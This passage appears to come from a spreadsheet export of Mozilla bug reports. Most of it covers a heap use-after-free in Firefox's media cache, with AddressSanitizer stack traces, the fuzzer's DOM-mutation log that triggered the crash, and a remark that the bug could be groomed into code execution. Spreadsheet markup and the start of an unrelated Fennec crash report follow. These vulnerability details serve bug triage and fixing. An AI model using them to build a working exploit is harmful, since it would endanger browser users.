		#22 0x7f031b2364ea in operator() /builds/worker/fetches/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/std_function.h:706:14
		#23 0x7f031b2364ea in mozilla::IdleTaskRunner::Run() /builds/worker/checkouts/gecko/xpcom/threads/IdleTaskRunner.cpp:109:14
Notice that `nsBufferedStream` gets deallocated through the `HTMLAudioElement` element destruction (`audioElement` in our code) which might by triggered by one of our fuzzing fuctions or "page switch/reload".
Because of bad referencing handling the `nsBufferedStream` object gets reused during the `mozilla::MediaCacheStream::NotifyDataReceived` method call:
	==54405==ERROR: AddressSanitizer: heap-use-after-free on address 0x62100323e900 at pc 0x55eb6b69bed7 bp 0x7f03072b6a70 sp 0x7f03072b6238
	READ of size 4096 at 0x62100323e900 thread T22 (MediaCache)
		#0 0x55eb6b69bed6 in __asan_memcpy /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
		#1 0x7f0320c6d37c in mozilla::MediaCacheStream::NotifyDataReceived(unsigned int, unsigned int, unsigned char const*) /builds/worker/checkouts/gecko/dom/media/MediaCache.cpp:2027:7
		#2 0x7f0320bee366 in mozilla::ChannelMediaResource::CopySegmentToCache(nsIInputStream*, void*, char const*, unsigned int, unsigned int, unsigned int*) /builds/worker/checkouts/gecko/dom/media/ChannelMediaResource.cpp:409:18
		#3 0x7f031b4fd0ae in nsBufferedInputStream::ReadSegments(nsresult (*)(nsIInputStream*, void*, char const*, unsigned int, unsigned int, unsigned int*), void*, unsigned int, unsigned int*) /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:453:12
		#4 0x7f0320bebad5 in OnDataAvailable /builds/worker/checkouts/gecko/dom/media/ChannelMediaResource.cpp:437:18
		#5 0x7f0320bebad5 in mozilla::ChannelMediaResource::Listener::OnDataAvailable(nsIRequest*, nsIInputStream*, unsigned long, unsigned int) /builds/worker/checkouts/gecko/dom/media/ChannelMediaResource.cpp:84:21
		#6 0x7f031b4ee028 in nsBaseChannel::OnDataAvailable(nsIRequest*, nsIInputStream*, unsigned long, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsBaseChannel.cpp:872:28
		#7 0x7f031b52f2fb in nsInputStreamPump::OnStateTransfer() /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:548:23
		#8 0x7f031b52e347 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:393:21
		#9 0x7f031b4ff23b in nsBufferedInputStream::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:724:20
		#10 0x7f03208e4d63 in mozilla::dom::BlobURLInputStream::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/checkouts/gecko/dom/file/uri/BlobURLInputStream.cpp:271:20
		#11 0x7f03208d8f84 in mozilla::(anonymous namespace)::InputStreamCallbackRunnable::Run() /builds/worker/checkouts/gecko/dom/file/ipc/RemoteLazyInputStream.cpp:54:16
		#12 0x7f031b26d379 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1149:16
		#13 0x7f031b27649c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:548:10
		#14 0x7f031c44ac0a in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:302:20
		#15 0x7f031c35ff11 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:335:10
		#16 0x7f031c35ff11 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:328:3
		#17 0x7f031c35ff11 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:310:3
		#18 0x7f031b267c59 in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:391:10
		#19 0x7f03373bb28e in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
		#20 0x7f033acc158f in start_thread nptl/pthread_create.c:463:8
		#21 0x7f033a889222 in clone misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
Proper heap grooming can give an attacker full control of this use-after-free vulnerability and as a result could allow it to be turned into arbitrary code execution.
### Crash Information
[ 4:29:44 AM ] ::  AudioBufferSourceNode_handler 
[ 4:29:44 AM ] ::  MediaStreamAudioDestinationNode_handler 
[ 4:29:44 AM ] ::  Before setTimeout 
[ 4:29:44 AM ] ::  SEED g_mainRandom:  2102332452 
[ 4:29:45 AM ] ::  Its fuzzing time!!!! 
[ 4:29:45 AM ] ::  SEED : g_fuzzRandom :  146570576 
[ 4:29:45 AM ] ::  [fuzz_nodes] :: Amount of mutation :  1 
[ 4:29:45 AM ] ::  Chosen function :  fuzz_deleteHTMLElement 
[ 4:29:45 AM ] ::  ()=&gt;{ document.querySelector("audio").src = document.querySelector("audio").src; } 
[ 4:29:46 AM ] ::  MediaRecorder_ondataavailable 
[ 4:29:46 AM ] ::  Its fuzzing time!!!! 
[ 4:29:46 AM ] ::  SEED : g_fuzzRandom :  650240019 
[ 4:29:46 AM ] ::  [fuzz_nodes] :: Amount of mutation :  1 
[ 4:29:46 AM ] ::  Chosen function :  fuzz_spin 
[ 4:29:46 AM ] ::  MediaRecorder_ondataavailable 
[ 4:29:46 AM ] ::  Its fuzzing time!!!! 
[ 4:29:46 AM ] ::  SEED : g_fuzzRandom :  1849907680 
[ 4:29:46 AM ] ::  [fuzz_nodes] :: Amount of mutation :  1 
[ 4:29:46 AM ] ::  Chosen function :  fuzz_deleteHTMLElement 
[ 4:29:46 AM ] ::  ()=&gt;{ document.body.removeChild(document.querySelector("audio")) } 
[ 4:29:46 AM ] ::  MediaRecorder_onstop 
[ 4:29:46 AM ] ::  Its fuzzing time!!!! 
[ 4:29:46 AM ] ::  SEED : g_fuzzRandom :  1240099704 
[ 4:29:46 AM ] ::  [fuzz_nodes] :: Amount of mutation :  3 
[ 4:29:46 AM ] ::  Chosen function :  fuzz_deleteRandomNode 
[ 4:29:46 AM ] ::  Deleting object :  AudioBufferSourceNode 
[ 4:29:46 AM ] ::  Chosen function :  fuzz_spin 
[ 4:29:46 AM ] ::  eventhandler5 
[ 4:29:46 AM ] ::  [5] Caller name :  fuzz_spin 
[ 4:29:46 AM ] ::  [object Event] 
[ 4:29:46 AM ] ::  ended 
[ 4:29:47 AM ] ::  Chosen function :  fuzz_deleteHTMLElement 
[ 4:29:47 AM ] ::  ()=&gt;{ document.querySelector("audio").src = randStr(); } 
[ 4:29:47 AM ] ::  eventhandler2 
[ 4:29:47 AM ] ::  [object IntersectionObserverEntry] 
[ 4:29:47 AM ] ::  undefined 
[ 4:29:47 AM ] ::  eventhandler5 
[ 4:29:47 AM ] ::  [object AnimationPlaybackEvent] 
[ 4:29:47 AM ] ::  finish 
[ 4:29:47 AM ] ::  eventhandler2 
[ 4:29:47 AM ] ::  [object IntersectionObserverEntry] 
[ 4:29:47 AM ] ::  undefined 
[ 4:29:47 AM ] ::  eventhandler5 
[ 4:29:47 AM ] ::  [object AnimationPlaybackEvent] 
[ 4:29:47 AM ] ::  finish 
[ 4:29:47 AM ] ::  eventhandler2 
[ 4:29:47 AM ] ::  [object IntersectionObserverEntry] 
[ 4:29:47 AM ] ::  undefined 
[ 4:29:47 AM ] ::  eventhandler5 
[ 4:29:47 AM ] ::  [object AnimationPlaybackEvent] 
[ 4:29:47 AM ] ::  finish 
[ 4:29:47 AM ] ::  eventhandler2 
[ 4:29:47 AM ] ::  [object IntersectionObserverEntry] 
[ 4:29:47 AM ] ::  undefined 
[ 4:29:47 AM ] ::  eventhandler5 
[ 4:29:47 AM ] ::  [object AnimationPlaybackEvent] 
[ 4:29:47 AM ] ::  finish 
[ 4:29:47 AM ] ::  eventhandler2 
[ 4:29:47 AM ] ::  [object IntersectionObserverEntry] 
[ 4:29:47 AM ] ::  undefined 
[ 4:29:47 AM ] ::  eventhandler5 
[ 4:29:47 AM ] ::  eventhandler5 
[ 4:29:47 AM ] ::  [object AnimationPlaybackEvent] 
[ 4:29:47 AM ] ::  finish 
[ 4:29:47 AM ] ::  eventhandler2 
[ 4:29:47 AM ] ::  [object IntersectionObserverEntry] 
[ 4:29:47 AM ] ::  undefined 
[ 4:29:47 AM ] ::  eventhandler2 
[ 4:29:47 AM ] ::  [object IntersectionObserverEntry] 
[ 4:29:47 AM ] ::  undefined 
[ 4:29:47 AM ] ::  eventhandler5 
[ 4:29:47 AM ] ::  eventhandler5 
[ 4:29:47 AM ] ::  [object AnimationPlaybackEvent] 
[ 4:29:47 AM ] ::  finish 
[ 4:29:47 AM ] ::  eventhandler5 
[ 4:29:47 AM ] ::  [object AnimationPlaybackEvent] 
[ 4:29:47 AM ] ::  finish 
[ 4:29:47 AM ] ::  eventhandler2 
[ 4:29:47 AM ] ::  [object IntersectionObserverEntry] 
[ 4:29:47 AM ] ::  undefined 
[ 4:29:47 AM ] ::  eventhandler2 
(....)
	==54405==ERROR: AddressSanitizer: heap-use-after-free on address 0x62100323e900 at pc 0x55eb6b69bed7 bp 0x7f03072b6a70 sp 0x7f03072b6238
	READ of size 4096 at 0x62100323e900 thread T22 (MediaCache)
		#0 0x55eb6b69bed6 in __asan_memcpy /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
		#1 0x7f0320c6d37c in mozilla::MediaCacheStream::NotifyDataReceived(unsigned int, unsigned int, unsigned char const*) /builds/worker/checkouts/gecko/dom/media/MediaCache.cpp:2027:7
		#2 0x7f0320bee366 in mozilla::ChannelMediaResource::CopySegmentToCache(nsIInputStream*, void*, char const*, unsigned int, unsigned int, unsigned int*) /builds/worker/checkouts/gecko/dom/media/ChannelMediaResource.cpp:409:18
		#3 0x7f031b4fd0ae in nsBufferedInputStream::ReadSegments(nsresult (*)(nsIInputStream*, void*, char const*, unsigned int, unsigned int, unsigned int*), void*, unsigned int, unsigned int*) /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:453:12
		#4 0x7f0320bebad5 in OnDataAvailable /builds/worker/checkouts/gecko/dom/media/ChannelMediaResource.cpp:437:18
		#5 0x7f0320bebad5 in mozilla::ChannelMediaResource::Listener::OnDataAvailable(nsIRequest*, nsIInputStream*, unsigned long, unsigned int) /builds/worker/checkouts/gecko/dom/media/ChannelMediaResource.cpp:84:21
		#6 0x7f031b4ee028 in nsBaseChannel::OnDataAvailable(nsIRequest*, nsIInputStream*, unsigned long, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsBaseChannel.cpp:872:28
		#7 0x7f031b52f2fb in nsInputStreamPump::OnStateTransfer() /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:548:23
		#8 0x7f031b52e347 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:393:21
		#9 0x7f031b4ff23b in nsBufferedInputStream::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:724:20
		#10 0x7f03208e4d63 in mozilla::dom::BlobURLInputStream::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/checkouts/gecko/dom/file/uri/BlobURLInputStream.cpp:271:20
		#11 0x7f03208d8f84 in mozilla::(anonymous namespace)::InputStreamCallbackRunnable::Run() /builds/worker/checkouts/gecko/dom/file/ipc/RemoteLazyInputStream.cpp:54:16
		#12 0x7f031b26d379 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1149:16
		#13 0x7f031b27649c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:548:10
		#14 0x7f031c44ac0a in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:302:20
		#15 0x7f031c35ff11 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:335:10
		#16 0x7f031c35ff11 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:328:3
		#17 0x7f031c35ff11 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:310:3
		#18 0x7f031b267c59 in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:391:10
		#19 0x7f03373bb28e in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
		#20 0x7f033acc158f in start_thread nptl/pthread_create.c:463:8
		#21 0x7f033a889222 in clone misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
	0x62100323e900 is located 0 bytes inside of 4096-byte region [0x62100323e900,0x62100323f900)
	freed by thread T0 (Web Content) here:
		#0 0x55eb6b69c7fd in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3
		#1 0x7f031b4f9bbd in operator delete[] /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:60:10
		#2 0x7f031b4f9bbd in nsBufferedStream::Close() /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:84:5
		#3 0x7f031b4fec52 in Close /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:391:21
		#4 0x7f031b4fec52 in CloseWithStatus /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:671:67
		#5 0x7f031b4fec52 in non-virtual thunk to nsBufferedInputStream::CloseWithStatus(nsresult) /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp
		#6 0x7f031b52d41d in nsInputStreamPump::Cancel(nsresult) /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:210:19
		#7 0x7f031b4e9618 in nsBaseChannel::Cancel(nsresult) /builds/worker/checkouts/gecko/netwerk/base/nsBaseChannel.cpp:399:15
		#8 0x7f031b4e968c in non-virtual thunk to nsBaseChannel::Cancel(nsresult) /builds/worker/checkouts/gecko/netwerk/base/nsBaseChannel.cpp
		#9 0x7f0320bec2bd in mozilla::ChannelMediaResource::CloseChannel() /builds/worker/checkouts/gecko/dom/media/ChannelMediaResource.cpp:631:15
		#10 0x7f0320befe92 in mozilla::ChannelMediaResource::Close() /builds/worker/checkouts/gecko/dom/media/ChannelMediaResource.cpp:575:5
		#11 0x7f0320be55ef in mozilla::ChannelMediaDecoder::Shutdown() /builds/worker/checkouts/gecko/dom/media/ChannelMediaDecoder.cpp:224:40
		#12 0x7f0320a2d7c0 in mozilla::dom::HTMLMediaElement::ShutdownDecoder() /builds/worker/checkouts/gecko/dom/html/HTMLMediaElement.cpp:2206:13
		#13 0x7f0320a4ba06 in mozilla::dom::HTMLMediaElement::~HTMLMediaElement() /builds/worker/checkouts/gecko/dom/html/HTMLMediaElement.cpp:4208:5
		#14 0x7f032097ca0d in mozilla::dom::HTMLAudioElement::~HTMLAudioElement() /builds/worker/checkouts/gecko/dom/html/HTMLAudioElement.cpp:58:1
		#15 0x7f031e5e92fd in nsIContent::Destroy() /builds/worker/checkouts/gecko/dom/base/FragmentOrElement.cpp:150:1
		#16 0x7f031b0bef72 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2417:7
		#17 0x7f031b0bd73b in nsPurpleBuffer::RemoveSkippable(nsCycleCollector*, js::SliceBudget&amp;, bool, bool, void (*)()) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2585:1
		#18 0x7f031b0bf79f in nsCycleCollector::ForgetSkippable(js::SliceBudget&amp;, bool, bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2653:14
		#19 0x7f031b0c7f6d in nsCycleCollector_forgetSkippable(js::SliceBudget&amp;, bool, bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3865:21
		#20 0x7f031e816e79 in FireForgetSkippable(bool, mozilla::TimeStamp) /builds/worker/checkouts/gecko/dom/base/nsJSEnvironment.cpp:1141:3
		#21 0x7f031e81831c in CCRunnerFired(mozilla::TimeStamp) /builds/worker/checkouts/gecko/dom/base/nsJSEnvironment.cpp:1644:9
		#22 0x7f031b2364ea in operator() /builds/worker/fetches/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/std_function.h:706:14
		#23 0x7f031b2364ea in mozilla::IdleTaskRunner::Run() /builds/worker/checkouts/gecko/xpcom/threads/IdleTaskRunner.cpp:109:14
	previously allocated by thread T0 (Web Content) here:
		#0 0x55eb6b69ca7d in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3
		#1 0x7f031b4f9e2e in operator new[] /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:47:10
		#2 0x7f031b4f9e2e in nsBufferedStream::Init(nsISupports*, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:73:13
		#3 0x7f031b4fc05c in nsBufferedInputStream::Init(nsIInputStream*, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:335:35
		#4 0x7f031b5303ba in NS_NewBufferedInputStream(nsIInputStream**, already_AddRefed&lt;nsIInputStream&gt;, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:1330:14
		#5 0x7f031b52c483 in nsInputStreamPump::CreateBufferedStreamIfNeeded() /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:672:17
		#6 0x7f031b52c0c8 in nsInputStreamPump::PeekStream(void (*)(void*, unsigned char const*, unsigned int), void*) /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:94:17
		#7 0x7f031b4ed088 in nsBaseChannel::OnStartRequest(nsIRequest*) /builds/worker/checkouts/gecko/netwerk/base/nsBaseChannel.cpp:827:14
		#8 0x7f031b52ec0e in nsInputStreamPump::OnStateStart() /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:481:21
		#9 0x7f031b52e337 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:390:21
		#10 0x7f03208e4d63 in mozilla::dom::BlobURLInputStream::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/checkouts/gecko/dom/file/uri/BlobURLInputStream.cpp:271:20
		#11 0x7f03208d8f84 in mozilla::(anonymous namespace)::InputStreamCallbackRunnable::Run() /builds/worker/checkouts/gecko/dom/file/ipc/RemoteLazyInputStream.cpp:54:16
		#12 0x7f031b2439cc in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:143:20
		#13 0x7f031b24d16a in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:473:16
		#14 0x7f031b24a4f8 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:757:26
		#15 0x7f031b248837 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:612:15
		#16 0x7f031b248c8d in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:396:36
		#17 0x7f031b253471 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:135:37
		#18 0x7f031b253471 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_3&gt;::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:534:5
		#19 0x7f031b26cb31 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1155:16
		#20 0x7f031b27649c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:548:10
		#21 0x7f031c44968f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:87:21
	Thread T22 (MediaCache) created by T0 (Web Content) here:
		#0 0x55eb6b6874ea in pthread_create /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cpp:214:3
		#1 0x7f03373ab5b4 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
		#2 0x7f033739c66e in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
		#3 0x7f031b26a09c in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:609:18
		#4 0x7f031b2741b8 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:555:12
		#5 0x7f031b27e421 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:169:57
		#6 0x7f0320c6181d in NS_NewNamedThread&lt;11&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:85:10
		#7 0x7f0320c6181d in mozilla::MediaCache::GetMediaCache(long, bool) /builds/worker/checkouts/gecko/dom/media/MediaCache.cpp:761:19
		#8 0x7f0320c738a0 in mozilla::MediaCacheStream::Init(long) /builds/worker/checkouts/gecko/dom/media/MediaCache.cpp:2675:17
		#9 0x7f0320bef521 in mozilla::ChannelMediaResource::Open(nsIStreamListener**) /builds/worker/checkouts/gecko/dom/media/ChannelMediaResource.cpp:500:30
		#10 0x7f0320be5fac in mozilla::ChannelMediaDecoder::Load(nsIChannel*, bool, nsIStreamListener**) /builds/worker/checkouts/gecko/dom/media/ChannelMediaDecoder.cpp:260:19
		#11 0x7f0320a526cb in nsresult mozilla::dom::HTMLMediaElement::SetupDecoder&lt;mozilla::ChannelMediaDecoder, nsIChannel*&amp;, bool&amp;, nsIStreamListener**&amp;&gt;(mozilla::ChannelMediaDecoder*, nsIChannel*&amp;, bool&amp;, nsIStreamListener**&amp;) /builds/worker/checkouts/gecko/dom/html/HTMLMediaElement.cpp:4844:27
		#12 0x7f0320a264cd in mozilla::dom::HTMLMediaElement::InitializeDecoderForChannel(nsIChannel*, nsIStreamListener**) /builds/worker/checkouts/gecko/dom/html/HTMLMediaElement.cpp:4927:10
		#13 0x7f0320a249ab in mozilla::dom::HTMLMediaElement::MediaLoadListener::OnStartRequest(nsIRequest*) /builds/worker/checkouts/gecko/dom/html/HTMLMediaElement.cpp:1320:7
		#14 0x7f031be4e996 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/checkouts/gecko/netwerk/protocol/http/HttpChannelChild.cpp:594:20
		#15 0x7f031be4d89f in mozilla::net::HttpChannelChild::OnStartRequest(mozilla::net::nsHttpResponseHead const&amp;, bool const&amp;, mozilla::net::nsHttpHeaderArray const&amp;, mozilla::net::HttpChannelOnStartRequestArgs const&amp;) /builds/worker/checkouts/gecko/netwerk/protocol/http/HttpChannelChild.cpp:525:3
		#16 0x7f031c136cd5 in mozilla::net::ChannelEventQueue::FlushQueue() /builds/worker/checkouts/gecko/netwerk/ipc/ChannelEventQueue.cpp:90:12
		#17 0x7f031c183537 in mozilla::net::ChannelEventQueue::ResumeInternal()::CompleteResumeRunnable::Run() /builds/worker/checkouts/gecko/netwerk/ipc/ChannelEventQueue.cpp:148:17
		#18 0x7f031b2439cc in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:143:20
		#19 0x7f031b24d16a in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:473:16
		#20 0x7f031b24a4f8 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:757:26
		#21 0x7f031b248837 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:612:15
		#22 0x7f031b248c8d in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:396:36
		#23 0x7f031b2534a4 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:138:37
		#24 0x7f031b2534a4 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_4&gt;::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:534:5
		#25 0x7f031b26cb31 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1155:16
		#26 0x7f031b27649c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:548:10
		#27 0x7f031c449684 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:109:5
		#28 0x7f031c35ff11 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:335:10
		#29 0x7f031c35ff11 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:328:3
		#30 0x7f031c35ff11 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:310:3
		#31 0x7f0322781f37 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137:27
		#32 0x7f0326145f4f in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:906:20
		#33 0x7f031c35ff11 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:335:10
		#34 0x7f031c35ff11 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:328:3
		#35 0x7f031c35ff11 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:310:3
		#36 0x7f0326145813 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:738:34
		#37 0x55eb6b6cf24d in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
		#38 0x55eb6b6cf671 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:309:18
		#39 0x7f033a798cb1 in __libc_start_main csu/../csu/libc-start.c:314:16
	SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/a</t>
        </is>
      </c>
      <c r="X6200" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6201">
      <c r="A6201" t="n">
        <v>510091</v>
      </c>
      <c r="B6201" t="inlineStr">
        <is>
          <t>2009-08-12 15:56:38 -0700</t>
        </is>
      </c>
      <c r="C6201" t="inlineStr">
        <is>
          <t>Fennec crash on mousedown on an iframe</t>
        </is>
      </c>
      <c r="D6201" t="inlineStr">
        <is>
          <t>2009-10-01 10:37:52 -0700</t>
        </is>
      </c>
      <c r="E6201" t="n">
        <v>1</v>
      </c>
      <c r="F6201" t="n">
        <v>1</v>
      </c>
      <c r="G6201" t="n">
        <v>3</v>
      </c>
      <c r="H6201" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6201" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6201" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6201" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6201" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6201" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6201" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6201" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6201" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q6201" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6201" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6201" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T6201" t="n">
        <v>1</v>
      </c>
      <c r="U6201" t="n">
        <v>0</v>
      </c>
      <c r="V6201" t="n">
        <v>19</v>
      </c>
      <c r="W6201" t="inlineStr">
        <is>
          <t>Created attachment 394148
URL to test
Go to the attachment with Fennec and try to click on the iframe.
Actual results: 
